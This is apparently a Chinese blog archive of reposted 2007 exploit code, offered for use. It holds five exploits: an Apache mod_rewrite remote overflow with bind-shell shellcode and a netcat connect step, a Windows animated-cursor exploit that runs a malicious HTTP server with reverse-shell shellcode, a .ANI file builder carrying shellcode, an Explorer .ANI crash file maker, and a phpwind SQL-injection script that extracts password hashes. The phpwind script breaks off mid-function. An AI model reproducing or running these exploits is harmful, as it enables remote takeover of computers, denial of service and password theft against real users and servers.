存档

‘矩阵毒刺’ 分类的存档

Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)

2007年6月18日 没有评论 107 views

/*
apache mod rewrite exploit (win32)
/*

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.c...

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://milw0rm.com/exploit... only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 80
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";

char finish[]= "HTTP/1.0\r\nHost: ";

char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";

int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
printf(" Exploit: apache mod rewrite exploit (win32)\n"
" By: fabio/b0x (oc-192, old CoTS member)\n"
"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
);
if (argc != 3) {
printf(" Usage: ./apache hostname rewrite_path\n");
exit(1);
}
printf("\n[+]Preparing payload\n");

char payload[748];
sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);

printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n"); />if (send(sockfd, payload, strlen(payload), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n");
close(sockfd);
printf("[+]Starting second stage...\n");
sleep(3);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT2);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload2, strlen(payload2), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n[+]Connecting to shell\n");
close(sockfd);

sleep(3);
int exec;
char what[1024];
sprintf(what," nc -w 10 %s 4445",argv[1]);
exec=system(what);
if (exec!=0){
printf("[-]Not hacked\n");
} else {
printf("[+]Owned\n");
}
exit(1);
}

分类: 矩阵毒刺 标签:

Microsoft Windows Animated Cursor Stack Overflow Exploit

2007年6月18日 没有评论 62 views

#!/usr/bin/env python
# $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
#
# Windows Animated Cursor Stack Overflow Exploit
# Copyright 2007 Ramon de Carvalho Valle ,
# RISE Security
#


# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#

#
# Windows Animated Cursor Stack Overflow Vulnerability
# http://www.determina.com/s...
#

from BaseHTTPServer import *
from os.path import *
from random import *
from socket import *
from string import *
from struct import *
from sys import *

#
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1
#
buf = \
'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \
'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \
'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \
'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \
'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \
'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \
'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \
'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \
'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \
'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \
'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \
'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \
'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \
'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \
'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \
'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \
'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \
'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \
'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \
'\xff\xd0'

# Target list
target = [ \
# call [ebx+4]

# Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language
{'addr': 0x25ba, 'len': 2, 'offset': 80},

# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
{'addr': 0x25d0, 'len': 2, 'offset': 80},

# Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English
{'addr': 0x769fc81a, 'len': 4, 'offset': 80},

# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English
# {'addr': 0x77d825d0, 'len': 4, 'offset': 80},

# Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil)
{'addr': 0x769dc81a, 'len': 4, 'offset': 80},

# Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil)
# {'addr': 0x77d625d0, 'len': 4, 'offset': 80},

# call [esi+4]

# Microsoft Windows XP SP1a userenv.dll English
{'addr': 0x75a758b1, 'len': 4, 'offset': 80},

# Microsoft Windows XP SP1a shell32.dll English
# {'addr': 0x77441a66, 'len': 4, 'offset': 80},

# Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil)
{'addr': 0x75a4579b, 'len': 4, 'offset': 80},

# Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil)
# {'addr': 0x77427214, 'len': 4, 'offset': 80},
]

# Target list index
tidx = 0

def randstr(count = 1, charset = 'ascii_alpha'):
# Set the charset
if charset == 'ascii_alpha':
charset = digits + ascii_uppercase + ascii_lowercase
elif charset == 'ascii_letters':
charset = ascii_letters
elif charset == 'ascii_lowercase':
charset = ascii_lowercase
elif charset == 'ascii_uppercase':
charset = ascii_uppercase
elif charset == 'digits':
charset = digits
elif charset == 'hexdigits':
charset = hexdigits
elif charset == 'octdigits':
charset = octdigits

# Create the string
i = 0
str = ''

while i < count:
str = str + charset[randint(0, len(charset)-1)]
i = i + 1

return str


def riff_chunk():
chunk_id = randstr(4)
chunk_data = randstr(randint(1, 256)*2)
chunk_size = pack('
return chunk_id + chunk_size + chunk_data


def riff_ani_file():
global buf, target, tidx

# Create the first header subchunk
anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1]
anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a])
anih_a = 'anih' + pack('
# Create the second header subchunk
anih_b = randstr(target[tidx]['offset'])

# Set the current indexed target
if target[tidx]['len'] == 1:
anih_b = anih_b + pack(' elif target[tidx]['len'] == 2:
anih_b = anih_b + pack(' else:
anih_b = anih_b + pack('
anih_b = 'anih' + pack('
# Format ID
riff = 'ACON'

# Random subchunks
for i in range(randint(1, 256)):
riff = riff + riff_chunk()

# First header subchunk
riff = riff + anih_a

# Random subchunks
for i in range(randint(1, 256)):
riff = riff + riff_chunk()

# Second header subchunk
riff = riff + anih_b

# Shellcode
riff = riff + buf

# File ID and length of file
riff = 'RIFF' + pack('
# Update the target list index
if tidx < len(target)-1:
tidx = tidx + 1
else:
tidx = 0

return riff


def randhtml():
global buf, target, tidx

# Random RIFF file extensions
extension = ['ani', 'avi', 'cdr', 'rmi', 'wav']

# Random html document
html = \
'\n\n\n\n\n'

for i in range(randint(0, 4)):
html = html + randstr(randint(1, 256)) + '\n'

for i in range(len(target)):
html = html + \
'

'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \
extension[randint(0, len(extension)-1)] + ')">\n'

for i in range(randint(0, 4)):
html = html + randstr(randint(1, 256)) + '\n'

html = html + '

\n'

for i in range(randint(0, 4)):
html = html + randstr(randint(1, 256)) + '\n'

html = html + '\n\n'

return html


class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)

if self.path == '/':
# Send the html document
html = randhtml()
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.send_header('Content-Length', str(len(html)))
self.end_headers()
self.wfile.write(html)<
br/> return

# Generate and send the RIFF file
riff = riff_ani_file()
self.send_header('Content-Type', 'application/octetstream')
self.send_header('Content-Length', str(len(riff)))
self.end_headers()
self.wfile.write(riff)


def usage():
print 'Usage: ./%s ' \
% basename(argv[0])


if __name__ == '__main__':
print 'Windows Animated Cursor Stack Overflow Exploit'
print 'Copyright 2007 RISE Security \n'

args = argv[1:]

if '-h' in args or '--help' in args:
usage()
exit()

http_host = '0.0.0.0'
http_port = 8080
host = '127.0.0.1'
port = 1234

try:
http_host = argv[1]
http_port = atoi(argv[2])
host = argv[3]
port = atoi(argv[4])
except:
pass

# Set shellcode host and port to connect to
buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:]
buf = buf[:166] + pack('
# Start the HTTP server
server_class = HTTPServer
httpd = server_class((http_host, http_port), RequestHandler)

print 'Listening on %s:%s' % (http_host, http_port)

try:
httpd.serve_forever()
except:
pass

分类: 矩阵毒刺 标签:

Windows .ANI LoadAniIcon Stack Overflow

2007年5月17日 没有评论 40 views

/*
* Copyright (c) 2007 devcode
*
*
*                       ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*    A vulnerability has been identified in Microsoft Windows,
*         which could be exploited by remote attackers to take complete
*         control of an affected system. This issue is due to a stack overflow
*    error within the "LoadAniIcon()" [user32.dll] function when rendering
*    cursors, animated cursors or icons with a malformed header, which could
*         be exploited by remote attackers to execute arbitrary commands by
*    tricking a user into visiting a malicious web page or viewing an email
*    message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*    None as of this time.
*
* Vulnerable systems:
*         Microsoft Windows 2000 Service Pack 4
*         Microsoft Windows XP Service Pack 2
*         Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
*         Microsoft Windows XP Professional x64 Edition
*         Microsoft Windows Server 2003
*         Microsoft Windows Server 2003 (Itanium)
*         Microsoft Windows Server 2003 Service Pack 1
*         Microsoft Windows Server 2003 Service Pack 1 (Itanium)
*         Microsoft Windows Server 2003 x64 Edition
*         Microsoft Windows Vista
*
*         Microsoft Internet Explorer 6
*         Microsoft Internet Explorer 7
*
*    This is a PoC and was created for educational purposes only. The
*         author is not held responsible if this PoC does not work or is
*         used for any other purposes than the one stated above.
*
* Notes:
*         For this to work on XP SP2 on explorer.exe, DEP has to be turned
*         off.
*
*/
#include <iostream>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";

typedef struct {
        const char *szTarget;
        unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
        { "Windows XP SP2", "\xC9\x29\xD4\x77" },       /* call esp */
        { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
        char szBuffer[1024];
        FILE *f;

        if ( argc < 3 ) {
                printf("%s\n", szIntro );
                return 0;
        }

        printf("[+] Creating ANI header...\n");
        memset( szBuffer, 0x90, sizeof( szBuffer ) );
        memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

        printf("[+] Copying 
shellcode...\n");
        memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
        memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

        printf("%s\n", argv[2] );
        f = fopen( argv[2], "wb" );
        if ( f == NULL ) {
                printf("[-] Cannot create file\n");
                return 0;
        }

        fwrite( szBuffer, 1, 1024, f );
        fclose( f );
        printf("[+] .ANI file succesfully created!\n");
        return 0;
}


PS:国外的,测试一下。

分类: 矩阵毒刺 标签:

Windows Explorer Unspecified .ANI File Exploit

2007年4月9日 没有评论 46 views

/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

unsigned char Ani_headers[] = 
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00"
"\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00"
"\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00"
"\x00\x00\x03" //Change this last char to avoid crash
;

int main(int argc, char* argv[])
{
FILE* anifile;
char evilbuff[4000];
printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n");
printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n");
if (argc!=2) {
printf("[+] Usage: %s <file.ani>\n",argv[0]);
return 0;
}

memset(evilbuff,'A',4000);
memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1);

if ((anifile=fopen(argv[1],"wb"))==0) {
printf("[-] Unable to access file.\n");
return 0;
}
fwrite( evilbuff, 1, 4000, anifile );
fclose(anifile);
printf("[+] Done. Have fun!\n");
return 0;

}

分类: 矩阵毒刺 标签:

phpwind5.0 Exp 0day

2007年4月6日 没有评论 82 views

<?php
print_r("

+------------------------------------------------------------------+

Exploit For Phpwind 5.X Version
BY  Loveshell
Just For Fun :)

+------------------------------------------------------------------+
");


ini_set("max_execution_time",0);
error_reporting(7);

$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F%09.72m.net; 1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D; 1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo "\r\n#Logging\t........";
if(islogin()) echo "Login Ok!\r\n";
else die("Not Login!\tCheck Your Cookie and Useragent!\r\n");


echo "#Testing\t........";
if(test()) echo "Vul!\r\n";
else die("Not Vul");


$hashtable='0123456789abcdef';
$count=0;

echo "#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){
    echo "第\t$i\t位:";
    $subpass=crack($i+8);
    $password=$password.$subpass;
    echo "$subpass\r\n";
}
    
echo "Password:\t$password";

echo "\r\nGood Luck $count Times\r\n";


function send($cmd,$path)
{
  global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

  $path=$bbspath."$path";
  $message = "POST ".$path." HTTP/1.1\r\n";
  $message .= "Accept: */*\r\n";
  $message .= "Accept-Language: zh-cn\r\n";
  $message .= "Referer: http://".$server.$path."\r\n";
  $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
  $message .= "User-Agent: ".$useragent."\r\n";
  $message .= "Host: ".$server."\r\n";
  $message .= "Content-length: ".strlen($cmd)."\r\n";
  $message .= "Connection: Keep-Alive\r\n";
  $message .= "Cookie: ".$cookie."\r\n";
  $message .= "\r\n";
  $message .= $cmd."\r\n";

  $count=$count+1;
  $fd = fsockopen( $server, 80 );
  fputs($fd,$message);
  $resp = "<pre>";
  while($fd&&!feof($fd)) {
  $resp .= fread($fd,1024);
  }
  fclose($fd);
  $resp .="</pre>";
  if($debug) {echo $cmd;echo $resp;}
//  echo $resp;
  return $resp;
}


function sqlject($sql){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $data=$data." union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql".'/*';
    $echo=send($data,'message.php');
    preg_match("/Total (.*)\(/i",$echo,$matches);
    if($matches[1]>2) return 1;
    else return 0;
}

function test(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'MySQL Server Error'))    return 1;
    else return 0;
}

function islogin(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'login.php"')) return 0;
    else return 1;
}

function crack($i){
global $hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
    $a=8;
    $b=15;}
else {
    $a=0;
    $b=8;
}


for($tmp=$a;$tmp<=$b;$tmp++){
    $sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
